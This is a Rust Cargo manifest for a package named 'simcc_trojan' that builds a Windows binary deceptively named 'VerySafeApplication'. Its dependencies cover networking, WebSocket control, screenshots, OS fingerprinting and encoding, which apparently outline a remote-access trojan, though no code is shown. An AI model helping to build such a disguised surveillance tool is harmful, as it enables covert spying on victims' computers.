[package]
name = "simcc_trojan"
version = "0.1.0"
edition = "2024"
authors = ["secret hacker man"]

[[bin]]
name = "VerySafeApplication"
path = "src/main.rs"


[target.x86_64-pc-windows-gnu]
linker = "x86_64-w64-mingw32-gcc"

[dependencies]
anyhow = "1.0.102"
reqwest = { version = "0.13.3", features = ["json"]}
rmp-serde = "1.3.1"
serde = { version = "1.0.228", features = ["derive"] }
serde_json = "1.0.149"
tokio = { version = "1", features = ["full"] }
tokio-tungstenite = { version = "0.29.0", features = ["native-tls"] }
futures-util = "0.3.32"
bon = "3.9.1"
os_info = "3.15.0"
flate2 = "1.1.9"
screenshots = "0.8.10"
base64 = "0.22.1"
serde_bytes = "0.11.19"
